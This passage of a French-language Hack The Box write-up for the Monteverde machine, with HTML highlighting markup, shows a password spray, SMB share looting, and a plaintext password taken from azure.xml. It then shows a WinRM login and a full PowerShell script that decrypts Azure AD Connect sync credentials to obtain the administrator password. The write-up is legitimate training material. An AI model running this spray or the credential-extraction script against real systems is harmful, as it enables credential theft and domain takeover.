class="line"><span class="cl">Guest </span></span><span class="line"><span class="cl">AAD_987d7f2f57d2 </span></span><span class="line"><span class="cl">mhope </span></span><span class="line"><span class="cl">SABatchJobs </span></span><span class="line"><span class="cl">svc-ata </span></span><span class="line"><span class="cl">svc-bexec </span></span><span class="line"><span class="cl">svc-netapp </span></span><span class="line"><span class="cl">dgalanos </span></span><span class="line"><span class="cl">roleary </span></span><span class="line"><span class="cl">smorgan </span></span></code></pre></td></tr></table> </div> </div><h3 id="password-spray">Password Spray </h3><p>On tente un <strong>password spray</strong> avec &ldquo;user == password&rdquo; et on découvre les identifiants suivants:</p> <ul> <li><code>SABatchJobs:SABatchJobs</code></li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nxc smb 10.10.10.172 -u users.txt -p users.txt --continue-on-success --no-bruteforce </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:MONTEVERDE<span class="o">)</span> <span class="o">(</span>domain:MEGABANK.LOCAL<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>-<span class="o">]</span> MEGABANK.LOCAL<span class="se">\G</span>uest:Guest STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>-<span class="o">]</span> MEGABANK.LOCAL<span class="se">\A</span>AD_987d7f2f57d2:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>-<span class="o">]</span> MEGABANK.LOCAL<span class="se">\m</span>hope:mhope STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>+<span class="o">]</span> MEGABANK.LOCAL<span class="se">\S</span>ABatchJobs:SABatchJobs </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>-<span class="o">]</span> MEGABANK.LOCAL<span class="se">\s</span>vc-ata:svc-ata STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>-<span class="o">]</span> MEGABANK.LOCAL<span class="se">\s</span>vc-bexec:svc-bexec STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>-<span class="o">]</span> MEGABANK.LOCAL<span class="se">\s</span>vc-netapp:svc-netapp STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>-<span class="o">]</span> MEGABANK.LOCAL<span class="se">\d</span>galanos:dgalanos STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>-<span class="o">]</span> MEGABANK.LOCAL<span class="se">\r</span>oleary:roleary STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.10.172 <span class="m">445</span> MONTEVERDE <span class="o">[</span>-<span class="o">]</span> MEGABANK.LOCAL<span class="se">\s</span>morgan:smorgan STATUS_LOGON_FAILURE </span></span></code></pre></td></tr></table> </div> </div><h3 id="user-and-azure_uploads-smb-shares--read-access">&lsquo;user$&rsquo; and &lsquo;azure_uploads&rsquo; smb shares : READ ACCESS </h3><p>Avec smbmap on trouve le share &lsquo;user$&rsquo; et &lsquo;azure_uploads&rsquo; accessibles en lecture :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">smbmap -H <span class="s2">&#34;10.10.10.172&#34;</span> -u SABatchJobs -p SABatchJobs </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> ________ ___ ___ _______ ___ ___ __ _______ </span></span><span class="line"><span class="cl"> /<span class="s2">&#34; )|&#34;</span> <span class="se">\ </span>/<span class="s2">&#34; || _ &#34;</span><span class="se">\ </span><span class="p">|</span><span class="s2">&#34; \ /&#34;</span> <span class="p">|</span> /<span class="s2">&#34;&#34;</span><span class="se">\ </span> <span class="p">|</span> __ <span class="s2">&#34;\ </span></span></span><span class="line"><span class="cl"><span class="s2"> (: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :) </span></span></span><span class="line"><span class="cl"><span class="s2"> \___ \ /\ \/. ||: \/ /\ \/. | /&#39; /\ \ |: ____/ </span></span></span><span class="line"><span class="cl"><span class="s2"> __/ \ |: \. |(| _ \ |: \. | // __&#39; \ (| / </span></span></span><span class="line"><span class="cl"><span class="s2"> /&#34;</span> <span class="se">\ </span> :<span class="o">)</span> <span class="p">|</span>. <span class="se">\ </span>/: <span class="o">||</span>: <span class="p">|</span>_<span class="o">)</span> :<span class="o">)</span><span class="p">|</span>. <span class="se">\ </span>/: <span class="p">|</span> / / <span class="se">\ </span> <span class="se">\ </span> /<span class="p">|</span>__/ <span class="se">\ </span></span></span><span class="line"><span class="cl"> <span class="o">(</span>_______/ <span class="p">|</span>___<span class="p">|</span><span class="se">\_</span>_/<span class="p">|</span>___<span class="p">|</span><span class="o">(</span>_______/ <span class="p">|</span>___<span class="p">|</span><span class="se">\_</span>_/<span class="p">|</span>___<span class="p">|</span><span class="o">(</span>___/ <span class="se">\_</span>__<span class="o">)(</span>_______<span class="o">)</span> </span></span><span class="line"><span class="cl">----------------------------------------------------------------------------- </span></span><span class="line"><span class="cl">SMBMap - Samba Share Enumerator v1.10.7 <span class="p">|</span> Shawn Evans - ShawnDEvans@gmail.com </span></span><span class="line"><span class="cl"> https://github.com/ShawnDEvans/smbmap </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Detected <span class="m">1</span> hosts serving SMB </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Established <span class="m">1</span> SMB connections<span class="o">(</span>s<span class="o">)</span> and <span class="m">1</span> authenticated session<span class="o">(</span>s<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> IP: 10.10.10.172:445 Name: MEGABANK.LOCAL Status: Authenticated </span></span><span class="line"><span class="cl"> Disk Permissions Comment </span></span><span class="line"><span class="cl"> ---- ----------- ------- </span></span><span class="line"><span class="cl"> ADMIN$ NO ACCESS Remote Admin </span></span><span class="line"><span class="cl"> azure_uploads READ ONLY </span></span><span class="line"><span class="cl"> C$ NO ACCESS Default share </span></span><span class="line"><span class="cl"> E$ NO ACCESS Default share </span></span><span class="line"><span class="cl"> IPC$ READ ONLY Remote IPC </span></span><span class="line"><span class="cl"> NETLOGON READ ONLY Logon server share </span></span><span class="line"><span class="cl"> SYSVOL READ ONLY Logon server share </span></span><span class="line"><span class="cl"> users$ READ ONLY </span></span></code></pre></td></tr></table> </div> </div><p>On remarque que azure_uploads est vide.</p> <p>Dans users$ on trouve le dossier d&rsquo;un autre utilisateur &ldquo;<strong>mhope</strong>&rdquo; avec un fichier <code>azure.xml</code> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ smbclient //10.10.10.172/users$ -U MEGABANK.LOCAL/SABatchJobs </span></span><span class="line"><span class="cl">Password <span class="k">for</span> <span class="o">[</span>MEGABANK.LOCAL<span class="se">\S</span>ABatchJobs<span class="o">]</span>: </span></span><span class="line"><span class="cl">Try <span class="s2">&#34;help&#34;</span> to get a list of possible commands. </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> ls </span></span><span class="line"><span class="cl"> . D <span class="m">0</span> Fri Jan <span class="m">3</span> 14:12:48 <span class="m">2020</span> </span></span><span class="line"><span class="cl"> .. D <span class="m">0</span> Fri Jan <span class="m">3</span> 14:12:48 <span class="m">2020</span> </span></span><span class="line"><span class="cl"> dgalanos D <span class="m">0</span> Fri Jan <span class="m">3</span> 14:12:30 <span class="m">2020</span> </span></span><span class="line"><span class="cl"> mhope D <span class="m">0</span> Fri Jan <span class="m">3</span> 14:41:18 <span class="m">2020</span> </span></span><span class="line"><span class="cl"> roleary D <span class="m">0</span> Fri Jan <span class="m">3</span> 14:10:30 <span class="m">2020</span> </span></span><span class="line"><span class="cl"> smorgan D <span class="m">0</span> Fri Jan <span class="m">3</span> 14:10:24 <span class="m">2020</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="m">31999</span> blocks of size 4096. <span class="m">28979</span> blocks available </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> <span class="nb">cd</span> mhope </span></span><span class="line"><span class="cl">smb: <span class="se">\m</span>hope<span class="se">\&gt;</span> ls </span></span><span class="line"><span class="cl"> . D <span class="m">0</span> Fri Jan <span class="m">3</span> 14:41:18 <span class="m">2020</span> </span></span><span class="line"><span class="cl"> .. D <span class="m">0</span> Fri Jan <span class="m">3</span> 14:41:18 <span class="m">2020</span> </span></span><span class="line"><span class="cl"> azure.xml AR <span class="m">1212</span> Fri Jan <span class="m">3</span> 14:40:23 <span class="m">2020</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="m">31999</span> blocks of size 4096. <span class="m">28979</span> blocks available </span></span><span class="line"><span class="cl">smb: <span class="se">\m</span>hope<span class="se">\&gt;</span> get azure.xml </span></span><span class="line"><span class="cl">getting file <span class="se">\m</span>hope<span class="se">\a</span>zure.xml of size <span class="m">1212</span> as azure.xml <span class="o">(</span>15.0 KiloBytes/sec<span class="o">)</span> <span class="o">(</span>average 15.0 KiloBytes/sec<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><p>Dans ce fichier se trouve un mot de passe <code>4n0therD4y@n0th3r$</code>:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">cat azure.xml </span></span><span class="line"><span class="cl">��&lt;Objs <span class="nv">Version</span><span class="o">=</span><span class="s2">&#34;1.1.0.1&#34;</span> <span class="nv">xmlns</span><span class="o">=</span><span class="s2">&#34;http://schemas.microsoft.com/powershell/2004/04&#34;</span>&gt; </span></span><span class="line"><span class="cl"> &lt;Obj <span class="nv">RefId</span><span class="o">=</span><span class="s2">&#34;0&#34;</span>&gt; </span></span><span class="line"><span class="cl"> &lt;TN <span class="nv">RefId</span><span class="o">=</span><span class="s2">&#34;0&#34;</span>&gt; </span></span><span class="line"><span class="cl"> &lt;T&gt;Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential&lt;/T&gt; </span></span><span class="line"><span class="cl"> &lt;T&gt;System.Object&lt;/T&gt; </span></span><span class="line"><span class="cl"> &lt;/TN&gt; </span></span><span class="line"><span class="cl"> &lt;ToString&gt;Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential&lt;/ToString&gt; </span></span><span class="line"><span class="cl"> &lt;Props&gt; </span></span><span class="line"><span class="cl"> &lt;DT <span class="nv">N</span><span class="o">=</span><span class="s2">&#34;StartDate&#34;</span>&gt;2020-01-03T05:35:00.7562298-08:00&lt;/DT&gt; </span></span><span class="line"><span class="cl"> &lt;DT <span class="nv">N</span><span class="o">=</span><span class="s2">&#34;EndDate&#34;</span>&gt;2054-01-03T05:35:00.7562298-08:00&lt;/DT&gt; </span></span><span class="line"><span class="cl"> &lt;G <span class="nv">N</span><span class="o">=</span><span class="s2">&#34;KeyId&#34;</span>&gt;00000000-0000-0000-0000-000000000000&lt;/G&gt; </span></span><span class="line"><span class="cl"> &lt;S <span class="nv">N</span><span class="o">=</span><span class="s2">&#34;Password&#34;</span>&gt;4n0therD4y@n0th3r$&lt;/S&gt; </span></span><span class="line"><span class="cl"> &lt;/Props&gt; </span></span><span class="line"><span class="cl"> &lt;/Obj&gt; </span></span><span class="line"><span class="cl">&lt;/Objs&gt;# </span></span></code></pre></td></tr></table> </div> </div><h3 id="evil-winrm--mhope---user-flag">Evil-winrm : mhope -&gt; user flag </h3><p>On obtient un accès via evil winrm en tant que <strong>mhope</strong> avec le mot de passe trouvé précédemment <code>4n0therD4y@n0th3r$</code> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">evil-winrm -u mhope -p <span class="s1">&#39;4n0therD4y@n0th3r$&#39;</span> -i <span class="s2">&#34;10.10.10.172&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Evil-WinRM shell v3.7 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Establishing connection to remote endpoint </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\m</span>hope<span class="se">\D</span>ocuments&gt; <span class="nb">cd</span> ../Desktop </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\m</span>hope<span class="se">\D</span>esktop&gt; cat <span class="s2">&#34;C:/Users/mhope/Desktop/user.txt&#34;</span> </span></span><span class="line"><span class="cl">4437.....5f01 </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="mhope-group--azure-admins">mhope Group : Azure Admins </h3><p>On observe que mhope fait partie du groupe <code>Azure Admins</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\m</span>hope<span class="se">\D</span>ocuments&gt; whoami /groups </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">GROUP INFORMATION </span></span><span class="line"><span class="cl">----------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Group Name Type SID <span class="nv">Attributes</span> </span></span><span class="line"><span class="cl"><span class="o">=======================================</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">MEGABANK<span class="se">\A</span>zure Admins Group S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><h3 id="sql-server-adsync-database">SQL Server: ADSync database </h3><p>On observer une processus &ldquo;sqlservr&rdquo;.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\m</span>hope<span class="se">\D</span>ocuments&gt; Get-Process sqlservr </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Handles NPM<span class="o">(</span>K<span class="o">)</span> PM<span class="o">(</span>K<span class="o">)</span> WS<span class="o">(</span>K<span class="o">)</span> CPU<span class="o">(</span>s<span class="o">)</span> Id SI ProcessName </span></span><span class="line"><span class="cl">------- ------ ----- ----- ------ -- -- ----------- </span></span><span class="line"><span class="cl"> <span class="m">832</span> <span class="m">114</span> <span class="m">406004</span> <span class="m">275560</span> <span class="m">3436</span> <span class="m">0</span> sqlservr </span></span></code></pre></td></tr></table> </div> </div><p>On remarque que <strong>sqlcmd</strong> est installé et on observe une base de donnée &ldquo;ADSync&rdquo;. On peut bien effectuer des requêtes vers la base de donnée sans utiliser de user/password :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\m</span>hope<span class="se">\D</span>ocuments&gt; sqlcmd -Q <span class="s1">&#39;SELECT name FROM sys.databases&#39;</span> </span></span><span class="line"><span class="cl">name </span></span><span class="line"><span class="cl">-------------------------------------------------------------------------------------------------------------------------------- </span></span><span class="line"><span class="cl">master </span></span><span class="line"><span class="cl">tempdb </span></span><span class="line"><span class="cl">model </span></span><span class="line"><span class="cl">msdb </span></span><span class="line"><span class="cl">ADSync </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">(</span><span class="m">5</span> rows affected<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="script">Script </h3><p>On trouve un script de <code>xpn</code> sur github. Ce script permet de se connecter à la base de donnée <code>ADSync</code>, d&rsquo;extraire la configuration (chiffrée), puis de la déchiffrer. On obtient alors le mot de passe de l&rsquo;administrator. Le script est basé sur l&rsquo;utilisation des infos de la base de données puis du binaire &lsquo;C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll&rsquo; pour réussir à récupérer la configuration contenant les creds administrateur :</p> <p><a class="link" href="https://gist.github.com/xpn/0dc393e944d8733e3c63023968583545" target="_blank" rel="noopener" >https://gist.github.com/xpn/0dc393e944d8733e3c63023968583545</a></p> <p>En utilisant le script, on remarque qu&rsquo;il ne fonctionne pas. Les lignes de code permettant la connection à la base de données semblent incorrectes :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\m</span>hope<span class="se">\D</span>ocuments&gt; <span class="nv">$client</span> <span class="o">=</span> new-object System.Data.SqlClient.SqlConnection -ArgumentList <span class="s2">&#34;Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$client</span>.Open<span class="o">()</span> </span></span></code></pre></td></tr></table> </div> </div><p>En cherchant sur internet, j&rsquo;ai pu corriger la ligne de code permettant la connexion à la bdd. De plus, j&rsquo;ai pu remarquer certaines erreurs avec des guillemets dans un format suspect. J&rsquo;ai bien remplacé les guillemets par &ldquo;&rsquo;&rdquo; ou &lsquo;&quot;&rsquo;.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Write-Host <span class="s2">&#34;AD Connect Sync Credential Extract POC&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$SQLServer</span> <span class="o">=</span> <span class="s2">&#34;127.0.0.1&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$SQLDBName</span> <span class="o">=</span> <span class="s2">&#34;ADSync&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$client</span> <span class="o">=</span> New-Object System.Data.SqlClient.SqlConnection </span></span><span class="line"><span class="cl"><span class="nv">$client</span>.ConnectionString <span class="o">=</span> <span class="s2">&#34;Server = </span><span class="nv">$SQLServer</span><span class="s2">; Database = </span><span class="nv">$SQLDBName</span><span class="s2">; Integrated Security = True&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$client</span>.Open<span class="o">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$cmd</span> <span class="o">=</span> <span class="nv">$client</span>.CreateCommand<span class="o">()</span> </span></span><span class="line"><span class="cl"><span class="nv">$cmd</span>.CommandText <span class="o">=</span> <span class="s2">&#34;SELECT keyset_id, instance_id, entropy FROM mms_server_configuration&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$reader</span> <span class="o">=</span> <span class="nv">$cmd</span>.ExecuteReader<span class="o">()</span> </span></span><span class="line"><span class="cl"><span class="nv">$reader</span>.Read<span class="o">()</span> <span class="p">|</span> Out-Null </span></span><span class="line"><span class="cl"><span class="nv">$key_id</span> <span class="o">=</span> <span class="nv">$reader</span>.GetInt32<span class="o">(</span>0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">$instance_id</span> <span class="o">=</span> <span class="nv">$reader</span>.GetGuid<span class="o">(</span>1<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">$entropy</span> <span class="o">=</span> <span class="nv">$reader</span>.GetGuid<span class="o">(</span>2<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">$reader</span>.Close<span class="o">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$cmd</span> <span class="o">=</span> <span class="nv">$client</span>.CreateCommand<span class="o">()</span> </span></span><span class="line"><span class="cl"><span class="nv">$cmd</span>.CommandText <span class="o">=</span> <span class="s2">&#34;SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = &#39;AD&#39;&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$reader</span> <span class="o">=</span> <span class="nv">$cmd</span>.ExecuteReader<span class="o">()</span> </span></span><span class="line"><span class="cl"><span class="nv">$reader</span>.Read<span class="o">()</span> <span class="p">|</span> Out-Null </span></span><span class="line"><span class="cl"><span class="nv">$config</span> <span class="o">=</span> <span class="nv">$reader</span>.GetString<span class="o">(</span>0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">$crypted</span> <span class="o">=</span> <span class="nv">$reader</span>.GetString<span class="o">(</span>1<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">$reader</span>.Close<span class="o">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">add-type -path <span class="s1">&#39;C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll&#39;</span> </span></span><span class="line"><span class="cl"><span class="nv">$km</span> <span class="o">=</span> New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager </span></span><span class="line"><span class="cl"><span class="nv">$km</span>.LoadKeySet<span class="o">(</span><span class="nv">$entropy</span>, <span class="nv">$instance_id</span>, <span class="nv">$key_id</span><span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">$key</span> <span class="o">=</span> <span class="nv">$null</span> </span></span><span class="line"><span class="cl"><span class="nv">$km</span>.GetActiveCredentialKey<span class="o">([</span>ref<span class="o">]</span><span class="nv">$key</span><span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">$key2</span> <span class="o">=</span> <span class="nv">$null</span> </span></span><span class="line"><span class="cl"><span class="nv">$km</span>.GetKey<span class="o">(</span>1, <span class="o">[</span>ref<span class="o">]</span><span class="nv">$key2</span><span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">$decrypted</span> <span class="o">=</span> <span class="nv">$null</span> </span></span><span class="line"><span class="cl"><span class="nv">$key2</span>.DecryptBase64ToString<span class="o">(</span><span class="nv">$crypted</span>, <span class="o">[</span>ref<span class="o">]</span><span class="nv">$decrypted</span><span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Write-Host <span class="nv">$decrypted</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$domain</span> <span class="o">=</span> <span class="k">select</span>-xml -Content <span class="nv">$config</span> -XPath <span class="s2">&#34;//parameter[@name=&#39;forest-login-domain&#39;]&#34;</span> <span class="p">|</span> <span class="k">select</span> @<span class="o">{</span><span class="nv">Name</span> <span class="o">=</span> <span class="s1">&#39;Domain&#39;</span><span class="p">;</span> <span class="nv">Expression</span> <span class="o">=</span> <span class="o">{</span><span class="nv">$_</span>.node.InnerXML<span class="o">}}</span> </span></span><span class="line"><span class="cl"><span class="nv">$username</span> <span class="o">=</span> <span class="k">select</span>-xml -Content <span class="nv">$config</span> -XPath <span class="s2">&#34;//parameter[@name=&#39;forest-login-user&#39;]&#34;</span> <span class="p">|</span> <span class="k">select</span> @<span class="o">{</span><span class="nv">Name</span> <span class="o">=</span> <span class="s1">&#39;Username&#39;</span><span class="p">;</span> <span class="nv">Expression</span> <span class="o">=</span> <span class="o">{</span><span class="nv">$_</span>.node.InnerXML<span class="o">}}</span> </span></span><span class="line"><span class="cl"><span class="nv">$password</span> <span class="o">=</span> <span class="k">select</span>-xml -Content <span class="nv">$decrypted</span> -XPath <span class="s2">&#34;//attribute&#34;</span> <span class="p">|</span> <span class="k">select</span> @<span class="o">{</span><span class="nv">Name</span> <span class="o">=</span> <span class="s1">&#39;Password&#39;</span><span class="p">;</span> <span class="nv">Expression</span> <span class="o">=</span> <span class="o">{</span><span class="nv">$_</span>.node.InnerXML<span class="o">}}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Write-Host <span class="o">(</span><span class="s2">&#34;Domain: &#34;</span> + <span class="nv">$domain</span>.Domain<span class="o">)</span> </span></span><span class="line"><span class="cl">Write-Host <span class="o">(</span><span class="s2">&#34;Username: &#34;</span> + <span 